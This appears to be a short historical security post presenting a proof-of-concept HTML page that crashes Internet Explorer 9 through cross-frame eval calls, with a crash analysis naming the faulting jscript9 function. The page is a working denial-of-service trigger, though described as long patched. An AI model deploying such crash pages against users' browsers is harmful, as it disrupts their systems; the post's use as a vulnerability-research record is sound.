After experimenting with cross-frame script execution in IE9, I noticed that calling eval from inside an iframe and then invoking any document method in the parent would reliably crash the browser. The setup is trivial, and the result was surprisingly consistent.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE9_DoS_xEval_any_document_method</title></head>
<body>
<!-- Step 2: clicking the button runs a document method in the parent context.
     getElementById() with no argument is enough; once step 1 has run,
     this call is what crashes the browser. -->
<input type="button" size="50" onclick="eval('document.getElementById()')" value="CrashMe!">
<!-- The iframe only needs to exist; its content is irrelevant. -->
<iframe name="iFrame" width="10" height="10"></iframe>
<script language="JavaScript">
    // Step 1: eval inside the iframe's script context, calling back into
    // the parent's eval. This is what leaves the cross-site state bad.
    iFrame.eval('parent.eval()');
</script>
</body>
</html>

The crash occurs in jscript9!Js::CrossSite::MarshalFrameDisplay, where the engine dereferences a frame display pointer obtained from the iframe's script context. The eval call inside the iframe leaves the cross-site thunk in an incorrect state, so the next document method call made from the parent reaches MarshalFrameDisplay with a null or otherwise invalid pointer. As reproduced, this is a denial of service (the browser crashes) rather than code execution: the exploitability classification came back as UNKNOWN, meaning it was not immediately weaponizable, but it was clearly an unintended state.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago and are shared here as a historical record for learning purposes.